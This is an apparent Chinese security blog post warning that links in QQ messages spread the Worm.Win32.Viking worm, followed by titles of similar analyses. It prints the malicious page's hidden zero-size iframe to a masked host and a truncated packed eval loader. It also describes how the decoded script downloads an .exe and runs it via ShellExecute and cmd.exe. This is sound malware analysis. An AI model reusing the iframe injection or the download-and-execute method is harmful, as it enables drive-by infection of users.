小心QQ信息中的网址传播维金Worm.Win32.Viking.ix/Worm.Viking.pg

简介: 小心QQ信息中的网址传播维金Worm.Win32.Viking.ix/Worm.Viking.pg

QQ收到信息:

/---
---/
hxxp://www.b**b**a*imm.info 主页包含代码:
/---
<iframe src=hxxp://www.9*7***72***5.com/do**e1****2.htm width=0 height=0></iframe>
---/
hxxp://www.9*7***72***5.com/do**e1****2.htm 包含代码:
/---
<script src=css.js></script>
---/
css.js 的内容为 JavaScript代码:
/---
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p;}('Z("//j//w……(略)……|110|114'.split('|'),0,{}))
---/

解密后的内容为一段 JavaScript脚本,主要功能是运行自定义函数 gn(n),利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 97725.exe,保存为 %windir%/~tmp.tmp,并利用Shell.Application 对象 Q 的 ShellExecute 方法执行命令:%windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。

加密方法与昨天发现的

一个传播 Worm.Win32.Viking.jg的 网页,解密有点难度

相同,就是下载的文件不同。


相关文章
|
2月前
|
JavaScript 前端开发 数据安全/隐私保护
小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的Worm.Win32.Viking.r
小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的Worm.Win32.Viking.r
|
2月前
|
JavaScript 前端开发 数据安全/隐私保护
QQ信息中传播Worm.Viking.es的这个网页真复杂
QQ信息中传播Worm.Viking.es的这个网页真复杂
|
2月前
|
安全 网络协议
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
|
2月前
|
JavaScript 前端开发
发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
|
2月前
|
安全 数据安全/隐私保护
某论坛挂马Worm.Win32.Autorun.eyh
某论坛挂马Worm.Win32.Autorun.eyh
|
2月前
|
安全 JavaScript 前端开发
某论坛上挂的东东,JPG图片 or 病毒Trojan.Win32.VB.azc?
某论坛上挂的东东,JPG图片 or 病毒Trojan.Win32.VB.azc?
|
2月前
|
安全 数据安全/隐私保护
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an
01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an
|
2月前
|
安全
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
|
2月前
|
安全 JavaScript 前端开发
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu